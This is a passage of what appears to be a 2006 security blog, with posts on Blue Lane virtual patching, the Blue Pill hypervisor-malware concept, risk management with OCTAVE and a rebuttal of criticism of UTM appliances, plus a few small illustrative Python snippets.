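    if not head.startswith(b"POST ") or len(body) <= MAX_POST_BODY:
        return raw
    body = body[:MAX_POST_BODY]
    # Keep the framing honest so the server doesn't wait on bytes that never come.
    lines = [l for l in head.split(b"\r\n")
             if not l.lower().startswith(b"content-length:")]
    lines.append(b"Content-Length: %d" % len(body))
    return b"\r\n".join(lines) + sep + body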

It’s an excellent solution that further adds to reducing our risks associated with patching, at a price point that is easily justified given both the soft cost-avoidance issues associated with patch deployment and the very real costs of potential downtime associated with patch installation failures.

Other manufacturers are rumored to be offering this virtual patching capability in their "deus ex machina" solutions, but I dare say that I have yet to see a more flexible, accurate and simple deployment than Blue Lane’s. In fact, I’ve yet to see anyone promise to deliver the fixes in the timeframe that Blue Lane does.

I give it the "It Kicks Ass" Award of the week.

See Blue Lane Technologies for a far better explanation than this one.

The product provides (now) virtual patching for Microsoft, Oracle, Sun, Unix and Linux.  Sure would be nice not to have to apply 65 patches to your most critical Oracle databases every quarter…

I am certain that elements of this entry will require additional explanation and I hope we can discuss them here as this is really a very well-focused product offering that does a great job without boiling the ocean.

Chris


100% Undetectable Malware (?)

July 23rd, 2006 No comments

I know I’m checking in late on this story, but for some reason it just escaped my radar a month or so ago when it appeared…I think that within the context of some of the virtualization discussions in the security realm, it was interesting enough to visit. 

Joanna Rutkowska, a security researcher for Singapore-based IT security firm COSEINC, posts on her Invisible Things blog some amazingly ingenious and frightening glimpses into the possibilities and security implications in terms of malware offered up by the virtualization technologies in AMD’s SVM (Secure Virtual machine)/Pacifica technology.* 

Joanna’s really talking about exploiting the virtualization capabilities of technology like Pacifica to apply stealth by moving the entire operating system into the virtualization layer (in memory — AKA "the matrix.")  If the malware itself controls the virtualization layer, then the "reality" of what is "good" versus "bad" (and detectable as such) is governed within the context of the malware itself.  You can’t detect "bad" via security mechanisms because it’s simply not an available option for the security mechanisms to do so.  Ouch.

This is not quite the same concept that we’ve seen thus far in more "traditional" (?) VM rootkits which load VMM’s below the OS level by exploiting a known vulnerability first.  With Blue Pill, you don’t *need* a vulnerability to exploit.  You should check out this story for more information on this topic such as SubVirt as described on eWeek.

Here is an excerpt from Joanna’s postings thus far:

"Now, imagine a malware (e.g. a network backdoor, keylogger, etc…)
whose capabilities to remain undetectable do not rely on obscurity of
the concept. Malware, which could not be detected even though its
algorithm (concept) is publicly known. Let’s go further and imagine
that even its code could be made public, but still there would be no
way for detecting that this creature is running on our machines…"

"The idea behind Blue Pill is simple: your operating system swallows the
Blue Pill and it awakes inside the Matrix controlled by the ultra thin
Blue Pill hypervisor. This all happens on-the-fly (i.e. without
restarting the system) and there is no performance penalty and all the
devices, like graphics card, are fully accessible to the operating
system, which is now executing inside virtual machine. This is all
possible thanks to the latest virtualization technology from AMD called
SVM/Pacifica."

Intrigued yet? 

This story (once I started researching) was originally commented on by Bill Brenner from techtarget, but I had not seen it until now.  Bill does an excellent job in laying out some of the more relevant points including highlighting the comparisons to the SubVirt rootkit as well as some counterpoints argued from the other side.  That last hyperlink to Kurt Wismer’s blog is just as interesting.  I love the last statement he makes:

"if undetectable virtualization technology can be used to hide the
presence of malware, then equally undetectable virtualization
technology pre-emptively deployed on the system should be able to
detect the undetectable vm-based stealth malware if/when it is encountered…

Alas, I was booked to attend Black Hat in August but my priorities have been re-clocked, so unfortunately I will not be able to attend Joanna’s presentation where she is demonstrating her functional prototype of Blue Pill.

I’ve submitted that virtualization is one of the reasons that embedding more and more security as an embedded function within the "network," treated as a single pane of glass for total situational awareness from a security perspective, is a flawed proposition: more and more of the "network" will become virtualized within the VM constructs themselves. 

I met with some of Microsoft’s security architects on this very topic and we stared intently at one another hoping for suggestions that would allow us to plan today for what will surely become a more frightening tomorrow.

I’m going to post about this shortly.

Happy reading.  There’s not much light in the rabbit hole, however.

*Here’s a comparison of the Intel/AMD approach to virtualization, including SVM.


Risk Management Requires Sophistication?

July 18th, 2006 2 comments

Mike Rothman commented today on another of Michael Farnum’s excellent series on being an "effective security manager."   

Mike R. starts off well enough in defining the value-prop of "Risk Management" as opposed to managing threats and vulnerabilities, and goes on to rightfully suggest that in order to manage risk you need to have a "value component" as part of the weighting metrics for decision making…all good stuff:

But more importantly, you need to get a feel for the RELATIVE value of stuff (is the finance system more important than the customer management) before you can figure out where you should be spending your time and money.

It goes without saying (and it’s an over-used cliche) that it doesn’t make much sense to spend $100,000 to protect a $100 asset, but strangely enough, that’s what a lot of folks do…and they call it "defense in depth." 
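
Since the $100,000-for-a-$100-asset quip is really just arithmetic, here’s the back-of-the-napkin version of the comparison a value-aware risk assessment forces you to make.  The formula is the standard ALE calculation; the numbers are invented:

# Back-of-the-napkin risk math: annualized loss expectancy vs. cost of the
# control. All numbers are invented; the point is the comparison, not the data.
def ale(asset_value, exposure_factor, annual_rate_of_occurrence):
    # ALE = (asset value x exposure factor) x expected incidents per year
    return asset_value * exposure_factor * annual_rate_of_occurrence

assets = {
    # name: (value, exposure factor if compromised, expected incidents/year)
    "finance system": (2_000_000, 0.4, 0.2),
    "marketing wiki": (100, 1.0, 2.0),
}

for name, (value, ef, aro) in assets.items():
    print(f"{name:16} ALE = ${ale(value, ef, aro):>12,.2f}")

# Spending $100,000 a year to protect the wiki (ALE: $200) is "defense in depth"
# only in the sense that the depth is coming out of your budget.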

Before you lump me into one of Michael F’s camps, no, I am not saying defense in depth is an invalid and wasteful strategy.  I *am* saying that people hide behind this term because they use it as a substitute for common sense and risk-focused information protection and assurance...

…back to the point at hand…

Here’s where it gets ugly as the conclusion of Mike R’s comments set me off a little because it really does summarize one of the biggest cop-outs in the management and execution of information protection/security today:

That is not a technique for the unsophisticated or those without significant political mojo. If you are new to the space, you are best off initially focusing on the stuff within your control, like defense in depth and security awareness.

This is a bullshit lay-down.  It does not take any amount of sophistication to perform a business-driven risk-assessment in order to support a risk-management framework that communicates an organization’s risk posture and investment in controls to the folks that matter and can do something about it. 

It takes a desire to do the right thing for the right reason that protects that right asset at the right price point.  Right?

While it’s true that most good IT folks inherently understand what’s important to an organization from an infrastructure perspective, they may not be able to understand why or be able to provide a transparent explanation as to what impacts based upon threats and exposed attack surfaces really mean to the BUSINESS.

You know how you overcome that shortfall?  You pick a business and asset-focused risk assessment framework and  you start educating yourself and your company on how, what and why you do what you do; you provide transparency in terms of function, ownership, responsibility, effectiveness, and budget.  These are metrics that count.

Don’t think you can do that because you don’t have a fancy title, a corner office or aren’t empowered to do so?  Go get another job because you’re not doing your current one any justice.

Want a great framework that is well-suited to this description and is a good starting point for both small and large companies?  Try Carnegie-Mellon’s OCTAVE.  Read the book.  Here’s a quick summary:

For an organization that wants to understand its information security needs, OCTAVE® (Operationally Critical Threat, Asset, and Vulnerability Evaluation℠) is a risk-based strategic assessment and planning technique for security.

OCTAVE is self-directed. A small team of people from the operational (or business) units and the IT department work together to address the security needs of the organization.  The team draws on the knowledge of many employees to define the current state of security, identify risks to critical assets, and set a security strategy.

OCTAVE is flexible. It can be tailored for most organizations. 

OCTAVE is different from typical technology-focused assessments. It focuses on organizational risk and strategic, practice-related issues, balancing operational risk, security practices, and technology.

Suggesting that you need to have political mojo to ask business unit leaders well-defined, unbiased, interview-based, guided queries is silly.  I’ve done it.  It works.  It doesn’t take a PhD or boardroom experience to pull it off.  I’m not particularly sophisticated and I trained a team of IT (but non-security) folks to do it, too.

But guess what?  It takes WORK.  Lots and lots of WORK.  And it’s iterative, not static.

Because the task list Michael lays out for security admins is so huge, anything that represents a significant investment in time, people or energy usually gets the lowest priority in the grand scheme of things.  That’s the real reason defense-in-depth is such a great hiding place.

With all that stuff to do, you *must* be doing what matters most, right?  You’re so busy!  Unsophisticated, but busy! 😉

Instead of focusing truly on the things that matter, we pile stuff up and claim that we’re doing the best we can with defense in depth without truly understanding that perhaps what we are doing is not the best use of money, time and people after all.

Don’t cop out.  Risk Management is neither "old school" nor a new concept; it’s common sense, it’s reasonable and it’s the right thing to do.

It’s Rational Security.

The Downside of All-in-one Assumptions…

July 16th, 2006 No comments

I read with some interest a recent Network Computing web posting by Don MacVittie  titled "The Downside of All-in-One Security."  In this post, Don makes some comments that I don’t entirely agree with, so since I can’t sleep, I thought I’d perform an autopsy to rationalize my discomfort.

I’ve posted before regarding Don’s commentary on UTM (that older story is basically identical to the one I’m commenting on today) in which he said:

Just to be entertaining, I’ll start by pointing out that most readers I talk to wouldn’t consider a UTM at this time. That doesn’t mean most organizations wouldn’t, there’s a limit to the number I can stay in regular touch with and still get my job done, but it does say something about the market.

All I can say is that I don’t know how many readers Don talks to, but the overall UTM market to which he refers can’t be the same UTM market which IDC defines as being set to grow to $2.4 billion in 2009, a 47.9 percent CAGR from 2004-2009.  Conversely, the traditional firewall and VPN appliance market is predicted to decline to $1.3 billion by 2009 with a negative CAGR of 4.8%.

The reality is that UTM players (whether perimeter or Enterprise/Service Provider class UTM) continue to post impressive numbers supporting this growth — and customers are purchasing these solutions.  Perhaps they don’t purchase "UTM" devices but rather "multi-function security appliances?" 🙂 

I’m just sayin’…

Don leads off with:


Unified Threat Management (UTM) products combine multiple security functions, such as firewall, content inspection and antivirus, into a single appliance. The assumption is UTM reduces management hassles by reducing the hardware in your security infrastructure … but you know what happens when you assume.

No real problems thus far.  My response to the interrogative posited by the last portion of Don’s intro is: "Yes, sometimes when you assume, it turns out you are correct."  More on that in a moment…


You can slow the spread of security appliances by collapsing many devices into one, but most organizations struggle to manage the applications themselves, not the hardware that runs them.

Bzzzzzzzzttttt.  The first half of the sentence is absolutely a valid and a non-assumptive benefit to those deploying UTM.  The latter half makes a rather sizeable assumption, one I’d like substantiated, please.

If we’re talking about security appliances, today there’s little separation between the application and the hardware that runs them.  That’s the whole idea behind appliances.

In many cases, these appliances use embedded software, RTOS in silicon, or very tightly couple the functional and performance foundations of the solution to the binding of the hardware and software combined.

I can’t rationalize someone not worrying about the "hardware," especially when they deploy things like HA clusters or a large number of branch office installations. 

You mean to tell me that in large enterprises (you notice that Don forces me to assume what market he’s referring to because he’s generalizing here…) that managing 200+ firewall appliances (hardware) is not a struggle?  Don talks about the application as an issue.  What about the operating system?  Patches?  Alerts/alarms?  Logs?  It’s hard enough to do that with one appliance.  Try 200.  Or 1000!

Content inspection, antivirus and firewall are all generally controlled by different crowds in the enterprise, which means some arm-wrestling to determine who maintains the UTM solution.

This may be an accurate assumption in a large enterprise, but in a small company (SME/SMB) it’s incredibly likely that the folks managing the CI, AV and firewall *are* the same people/person.  Chances are it’s Bob in accounting!


Then there’s bundling. Some vendors support best-of-breed security apps, giving you a wider choice. However, each application has to crack packets individually–which affects performance.

So there’s another assumptive generalization that somehow taking traffic and vectoring it off at high speed/low latency to processing functions highly tuned for specific tasks is going to worsen performance.  Now I know that Don didn’t say it would worsen performance, he said it "…affect(s) performance," but we all know what Don meant — even if we have to assume. 😉

Look, this is an over-reaching and generalized argument and the reality is that even "integrated" solutions today perform replay and iterative inspection that requires multiple packet visitations with "individual packet cracking" — they just happen to do it in parallel — either monolithically in one security stack or via separate applications.  Architecturally, there are benefits to this approach.

Don’t throw the baby out with the bath water…

How do you think stand-alone non-in-line IDS/IPS works in conjunction with firewalls today in non-UTM environments?  The firewall gets the packet as does the IDS/IPS via a SPAN port, a load balancer, etc…they crack the packets independently, but in the case of IDS, it doesn’t "affect" the firewall’s performance one bit.  Using this analogy, in an integrated UTM appliance, this example holds water, too.

Furthermore, in a UTM approach the correlation for disposition is usually done on the same box, not via an external SIEM…further saving the poor user from having to deploy yet another appliance.  Assuming, of course, that this is a problem in the first place. 😉
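
The "individual packet cracking" argument is really about where the fan-out happens, not whether it happens.  Here’s a hand-wavy sketch of the parallel-dispatch model; the inspectors and verdict logic are obviously placeholders:

# Sketch of the fan-out a UTM-style stack does internally: one packet handed to
# several inspection engines in parallel, verdicts correlated on the same box.
# The inspectors are placeholders, not real engines.
from concurrent.futures import ThreadPoolExecutor

def firewall(pkt):   return "allow"    # 5-tuple policy check
def antivirus(pkt):  return "allow"    # signature scan
def ids(pkt):        return "alert"    # protocol/anomaly check

INSPECTORS = (firewall, antivirus, ids)

def disposition(pkt):
    # Each engine "cracks" the packet once, concurrently; disposition is local.
    with ThreadPoolExecutor(max_workers=len(INSPECTORS)) as pool:
        verdicts = list(pool.map(lambda inspect: inspect(pkt), INSPECTORS))
    if "drop" in verdicts:
        return "drop"
    return "allow-with-alert" if "alert" in verdicts else "allow"

print(disposition(b"\x45\x00..."))   # toy packet bytes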

I’d like some proof points and empirical data that clearly demonstrate this assumption regarding performance.  And don’t hide behind the wording.  The implication here is that you get "worse" performance.  With today’s numbers from dual CPU/multi-core processors, huge busses, NPUs and dedicated hardware assist, this set of assumptions is flawed.

Other vendors tweak performance by tightly integrating apps, but you’re stuck with the software they’ve chosen or developed.

…and then there are those vendors that tweak performance by tightly integrating the apps and allow the customer to define what is best-of-breed without being "stuck with the software [the vendor has] chosen or developed."  You get choice and performance.  To assume otherwise is to not perform diligence on the solutions available today.  If you need to guess who I am talking about…


For now, the single platform model isn’t right for enterprises large enough to have a security staff.

Firstly, this statement is just plain wrong.  It *may* be right if you’re talking about deploying a $500 perimeter UTM appliance (or a bunch of them) in the core of a large enterprise, but nobody would do that.  This argument is completely off course when you’re talking about Enterprise-class UTM solutions.

In fact, if you choose the right architecture, assuming the statement above regarding separate administrative domains is correct, you can have the AV people manage the AV, the firewall folks manage the firewalls, etc. and do so in a very reliable, high speed and secure consolidated/virtualized fashion from a UTM architecture such as this.

That said, the sprawl created by existing infrastructure can’t go on forever–there is a limit to the number of security-only ports you can throw into the network. UTM will come eventually–just not today.

So, we agree again…security sprawl cannot continue.  It’s an overwhelming issue for both those who need "good enough" security as well as those who need best-of-breed. 

However, your last statement leaves me scratching my head in confused disbelief, so I’ll just respond thusly:

UTM isn’t "coming," it’s already arrived.  It’s been here for years without the fancy title.  The same issues faced in the datacenter in general are the same facing the microcosm of the security space — from space, power, and cooling to administration, virtualization and consolidation — and UTM helps solve these challenges.  UTM is here TODAY, and to assume anything otherwise is a foolish position.

My $0.02 (not assuming inflation)

/Chris

Got a [Security] question? Ask the Ninja…

July 16th, 2006 2 comments

So, like, why is ‘thr33’ the magic number?  The Ninja answers thusly: "Combine the Wizard of Oz, Reign of Fire, and Jonathan Livingston Seagull and you’ll get the picture."  Then again, you probably won’t.

Confused as to just what the hell this has to do with security?   

So am I, so my apologies go out to any real ninjas who happen to be using their spare time away from battling Magons (half monkey/half dragon — firebreathers with a prehensile tail!) and rather than relax with a Sobe and a stepped down pilates session have decided instead to read my security blog.

That happens you know.  All.  The.  Time.

Seriously, though, there is a security reference in here.  Pay attention.  First person who responds in the comments section below as to the security reference gets a free pouch of homemade guacamole.  You pay shipping.

Click on the little ‘play’ icon in the pic below…
